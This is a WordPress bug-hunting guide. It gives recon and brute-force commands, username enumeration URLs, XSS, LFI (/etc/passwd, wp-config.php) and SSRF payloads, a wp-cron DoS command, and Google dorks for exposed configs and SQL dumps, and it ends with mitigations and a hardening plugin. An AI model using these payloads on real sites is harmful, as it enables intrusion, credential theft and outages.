Mastering WordPress

Comprehensive guide to WordPress bug hunting, from architecture understanding to advanced exploitation techniques.

Phase 0

Understanding WordPress Architecture

1. Core WordPress files - rarely the target
Core: Main WordPress files maintained by the community
2. Themes can contain vulnerabilities
Themes: Control design but often include PHP/JS code
3. Attackers usually target plugins, not core
Plugins: Extend functionality but are the biggest source of vulnerabilities
4. Key insight for bug hunters
Attackers rarely target WordPress core itself; they exploit poorly coded plugins or misconfigured themes
Phase 1

WordPress File/Folder Hierarchy

1. Typical WordPress directory structure
/ (webroot)
├─ index.php          # Loads WordPress environment
├─ license.txt        # WordPress GPL license
├─ readme.html        # Basic info about WP installation
├─ wp-config.php      # Main configuration (DB, keys, salts)
├─ wp-login.php       # User login & authentication
├─ xmlrpc.php         # XML-RPC API endpoint
├─ wp-admin/          # WordPress admin dashboard core
├─ wp-includes/       # Core WordPress libraries & functions
└─ wp-content/        # User content (safe to edit)
   ├─ plugins/        # Installed plugins
   ├─ themes/         # Installed themes
   ├─ uploads/        # Media library (user uploaded files)
   ├─ languages/      # Translation files
   ├─ mu-plugins/     # Must-use plugins (auto-loaded)
   ├─ cache/          # Cache files
   └─ upgrade/        # Temporary files during updates
Tool 2

Essential Tools 1: WPScan

1. Basic WPScan with API token for vulnerability data
wpscan --url https://domain.com --api-token YOUR_TOKEN
2. Aggressive scan: all themes, all plugins, users (WPScan's --enumerate/-e takes one comma-separated list; repeating -e overrides the earlier value)
wpscan --url https://domain.com --disable-tls-checks --api-token <here> -e ap,at,u --plugins-detection aggressive --force
Tool 3

Essential Tools 2: Nmap

1. Discover open ports and services
nmap -p- --min-rate 1000 -T4 -A target.com -oA fullscan
Tool 4

Essential Tools 3: DirBuster/ffuf

1. Find hidden directories with dirsearch
dirsearch -u https://example.com --full-url --deep-recursive -r
2. Comprehensive dirsearch with all extensions
dirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1
3. Comprehensive ffuf directory bruteforce
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 100 -r -o results.json
4. Fuzz with CoffinXP WordPress wordlist
ffuf -w @coffin-payloads/coffin@wp-fuzz.txt -u https://target.com/FUZZ -fc 401,403,404 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf -ac -H "User-Agent: Mozilla/5.0" -r -t 60 --rate 100 -c
5. CoffinXP WordPress fuzzing wordlist
https://github.com/coffinxp/payloads/blob/main/coffin@wp-fuzz.txt
Enum 5

Username Enumeration via REST API

#1 Default REST API endpoint to list users
/wp-json/wp/v2/users
#2 Direct user ID probing (start with 1)
/wp-json/wp/v2/users/1
#3 Continue enumerating user IDs
/wp-json/wp/v2/users/2
#4 Bypass with rest_route parameter
/wp-json/?rest_route=/wp/v2/users/
#5 Bypass via index.php
/index.php?rest_route=/wp/v2/users
#6 Paginated user listing
/wp-json/wp/v2/users?page=1
#7 Search for a specific username
/wp-json/wp/v2/users?search=admin
#8 Alternative endpoint (older WP versions)
/wp-json/users
Brute 6

Admin Panel Password Bruteforce

#1 WPScan brute force with a single username
wpscan --url https://target.com --username admin --passwords /path/to/passwords.txt --disable-tls-checks
#2 WPScan brute force with multiple usernames
wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks
#3 WPScan brute force via XML-RPC
wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10
Exposed 7

Exposed 1: Configuration Files

#1 Main WordPress configuration file
/wp-config.php
#2 Backup of config file
/wp-config.php.bak
#3 Saved version
/wp-config.php.save
#4 Old version
/wp-config.php.old
#5 Original version
/wp-config.php.orig
#6 Tilde backup (Linux)
/wp-config.php~
#7 Exposed as text file
/wp-config.php.txt
#8 Compressed config
/wp-config.php.zip
Exposed 8

Exposed 2: Environment Files

#1 Environment variables file
/.env
#2 Env backup
/.env.bak
#3 Env old version
/.env.old
#4 Env saved version
/.env.save
#5 Example env file
/.env.example
#6 Local env file
/.env.local
Exposed 9

Exposed 3: Backup & Archive Files

#1 Site backup archive
/backup.zip
#2 Compressed tar backup
/backup.tar.gz
#3 Database dump
/db.sql
#4 Database export
/database.sql
#5 SQL dump file
/dump.sql
#6 Full WordPress archive
/wordpress.zip
Exposed 10

Exposed Registration Page

1. If registration is enabled, attackers can create accounts without restrictions
/wp-login.php?action=register
2. Nuclei template to detect the registration page (matchers-condition: and is required so that both the status check and the word check must pass; without it Nuclei ORs the matchers and any 200 response would count as a hit)
id: wp-login-register-detect

info:
  name: Detect WordPress Registration Page
  author: yourname
  severity: info
  description: Checks for WordPress user registration endpoint exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?action=register"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'user_login'
          - 'user_email'
        condition: and
      - type: status
        status:
          - 200
Setup 11

Unsecured WordPress Setup Wizard

1. WordPress setup wizard - can expose the DB config form
/wp-admin/setup-config.php?step=1
2. Nuclei template for setup config detection
https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml
Exploit 12

Exploiting 1: Admin-AJAX XSS

#1 XSS via admin-ajax.php with unescaped options
domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location':'Cairo','units':'C','forecast_days':'5</script><script>alert(document.domain)</script>custom_name':'Cairo','animated':'true'}
#2 XSS via theme thumb.php with src parameter
domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png
Exploit 13

Exploiting 2: RCE & LFI

#1 LFI via mail-masta plugin
https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
#2 LFI basic attempt
http://target.com/index.php?page=about.php
#3 LFI with path traversal
http://target.com/index.php?page=../../../../etc/passwd
#4 LFI targeting wp-config.php via theme
http://target.com/wp-content/themes/twentytwenty/page.php?file=../../../../wp-config.php
#5 LFI via plugin download function
http://target.com/wp-content/plugins/plugin-name/download.php?file=../../../../wp-config.php
6. CoffinXP LFI payload wordlist
https://github.com/coffinxp/payloads/blob/main/lfi.txt
DoS 14

Abusing wp-cron.php for Denial of Service

1. DoS via wp-cron.php (causes high server load)
./doser -t 100000 -g "https://target.com/wp-cron.php"
2. How to confirm the DoS vulnerability
If the site returns a 500 Internal Server Error upon refresh, the DoS issue is confirmed
3. Go-based DoS tool for WordPress
https://github.com/Quitten/doser.go
Exposed 15

Exposed WordPress Debug Log

1. Debug log may expose sensitive PHP errors and paths
https://target.com/wp-content/debug.log
Install 16

WordPress Installation Script

1. If accessible, attackers can reinstall WordPress with their own DB credentials
https://target.com/wp-admin/install.php
SSRF 17

WordPress SSRF

1. SSRF via oEmbed proxy endpoint
https://target.com/wp-json/oembed/1.0/proxy?url=<attacker-controlled-url>
2. Potential SSRF impacts
Impact: Internal network scanning, accessing cloud metadata (AWS/GCP), leaking sensitive data from internal services
3. Nuclei template for WordPress takeover/SSRF
https://github.com/coffinxp/nuclei-templates/blob/main/wordpress-takeover.yaml
Dir 18

Directory Listing Enabled

#1 May reveal media assets, documents, or user uploads
https://target.com/wp-content/uploads/
#2 Could expose plugin files, outdated versions, or config details
https://target.com/wp-content/plugins/
#3 May allow attackers to inspect theme files and templates
https://target.com/wp-content/themes/
#4 Often exposes core PHP files and scripts
https://target.com/wp-includes/
#5 May leak archived site data or database exports
https://target.com/wp-content/backup/
#6 Backups in admin directories can be discovered
https://target.com/wp-admin/backup/
Dork 19

Google Dorks 1: Finding WordPress Sites

#1 Find WordPress sites by wp-content path
site:target.com inurl:wp-content
#2 Find WordPress admin panels
site:target.com inurl:wp-admin
#3 Find by WordPress footer text
site:target.com "Powered by WordPress"
Dork 20

Google Dorks 2: Version Detection

#1 Find readme.html for version info
inurl:readme.html "WordPress"
#2 Find by embed script (version in file)
inurl:/wp-includes/js/wp-embed.min.js
#3 Search for version mentions
site:target.com "WordPress" "version"
Dork 21

Google Dorks 3: Vulnerable Plugins

#1 Find specific plugin paths
inurl:wp-content/plugins/plugin-name
#2 Find plugins with directory listing enabled
site:target.com inurl:wp-content/plugins "index of"
#3 Find sites using vulnerable plugins
site:target.com "wp-content/plugins" + "vulnerable-plugin-name"
Dork 22

Google Dorks 4: Vulnerable Themes

#1 Find specific theme paths
inurl:wp-content/themes/theme-name
#2 Find themes with directory listing
site:target.com inurl:wp-content/themes "index of"
#3 Find sites using vulnerable themes
site:target.com "wp-content/themes" + "vulnerable-theme-name"
Dork 23

Google Dorks 5: Login Pages

#1 Find WordPress login pages
inurl:wp-login.php
#2 Find by login page title
intitle:"WordPress › Login"
#3 Find admin-ajax endpoint
site:target.com inurl:wp-admin/admin-ajax.php
Dork 24

Google Dorks 6: Config Files

#1 Find exposed wp-config.php
inurl:wp-config.php
#2 Find config mentions in text files
site:target.com ext:txt "wp-config"
#3 Find WordPress mentions in log files
site:target.com ext:log "wordpress"
Dork 25

Google Dorks 7: Backup Files

#1 Find backup.zip in wp-content
inurl:wp-content backup.zip
#2 Find SQL dumps mentioning WordPress
site:target.com ext:sql "wordpress"
#3 Find .bak files with wp-config
site:target.com ext:bak "wp-config"
Dork 26

Google Dorks 8: Database Dumps

#1 Find SQL dumps with wp_users table
site:target.com ext:sql "INSERT INTO wp_users"
#2 Find database dump mentions
site:target.com "database dump" "wordpress"
Dork 27

Google Dorks 9: Error Messages

#1 Find fatal errors mentioning WordPress
site:target.com "Fatal error" "wordpress"
#2 Find database errors
site:target.com "WordPress database error"
Dork 28

Google Dorks 10: Sensitive Information

#1 Find open directory listing for wp-admin
site:target.com Index of /wp-admin
#2 Find uploads directory listing
site:target.com "index of" /wp-content/uploads/
#3 Find REST API user endpoint
site:target.com inurl:wp-json/wp/v2/users
#4 Find XML-RPC endpoint
site:target.com "xmlrpc.php"
Dork 29

Google Dorks 11: Directory Listings

#1 Find wp-includes directory listing
site:target.com intitle:"index of" wp-includes
#2 Find wp-content directory listing
site:target.com intitle:"index of" wp-content
Dork 30

Google Dorks Reference

1. WPScan WordPress vulnerability database
https://wpscan.com/wordpresses/
Defense 31

Prevention and Mitigation

#1: Keep WordPress, Plugins & Themes Updated
Regular patching reduces exposure to known CVEs and zero-days
#2: Remove Unused Plugins & Themes
Every plugin is an extra attack surface - delete what you don't use
#3: Limit Access to Sensitive Files & Endpoints
Block public access to /wp-config.php, .env, .htaccess, /xmlrpc.php, /wp-admin/, /wp-cron.php
#4: Enforce Strong Authentication
Use strong, unique passwords and enable 2FA for all admin accounts
#5: Rate Limiting & WAF
Protect against brute force, XML-RPC abuse, and DoS with rate limiting or a WAF (Cloudflare, ModSecurity)
#6: Secure Backups
Ensure backups are stored outside the web root and are not publicly accessible
#7: Subdomain & DNS Hygiene
Regularly audit DNS records to prevent subdomain takeover risks
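The controls above that live inside WordPress rather than in the web server (the XML-RPC brute-force path, the /wp/v2/users enumeration endpoints including the ?rest_route= variants, and the open registration page) can be applied with a must-use plugin; this is an added example written for this guide, not code from the page or from WordPress itself, and the file name harden-wp.php under wp-content/mu-plugins/ is an assumption.

```php
<?php
/**
 * Plugin Name: Harden WP endpoints (added example for mitigation #3)
 * Save as wp-content/mu-plugins/harden-wp.php; mu-plugins load on every request.
 * File-level blocks (wp-config.php, .env, backups, wp-cron.php) still belong in the
 * web server configuration; PHP never runs for a static file that the server serves.
 */

// xmlrpc.php multiplies login attempts (system.multicall) and is abused for DoS.
// Disabling it makes WPScan's XML-RPC password attack return "method not allowed".
add_filter( 'xmlrpc_enabled', '__return_false' );

// Hide every /wp/v2/users route from unauthenticated callers. Filtering the route table
// also covers /wp-json/?rest_route=/wp/v2/users and /index.php?rest_route=..., because
// all three spellings resolve to the same registered endpoints; callers get a 404
// (rest_no_route) instead of the user list. Logged-in requests (block editor, admin
// screens, which send X-WP-Nonce) keep working.
add_filter( 'rest_endpoints', function ( array $endpoints ) {
    if ( is_user_logged_in() ) {
        return $endpoints;
    }
    foreach ( array_keys( $endpoints ) as $route ) {
        // Matches /wp/v2/users, /wp/v2/users/(?P<id>[\d]+) and /wp/v2/users/me.
        if ( preg_match( '#^/wp/v2/users(/|$)#', $route ) ) {
            unset( $endpoints[ $route ] );
        }
    }
    return $endpoints;
} );

// Force "Anyone can register" off in code, so /wp-login.php?action=register redirects
// with registration=disabled even if the option is flipped in the database.
// Remove this filter on sites that intentionally allow self-registration.
add_filter( 'option_users_can_register', '__return_zero' );

// Setting DISABLE_WP_CRON to true belongs in wp-config.php (before wp-settings.php
// loads); pair it with a system cron that runs `wp cron event run --due-now` or
// requests wp-cron.php from localhost, then block /wp-cron.php at the web server.
```

After deploying, re-run the enumeration URLs from the REST API section against your own site and confirm each returns a 404 rather than a JSON user list.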
Tools

Tools & Resources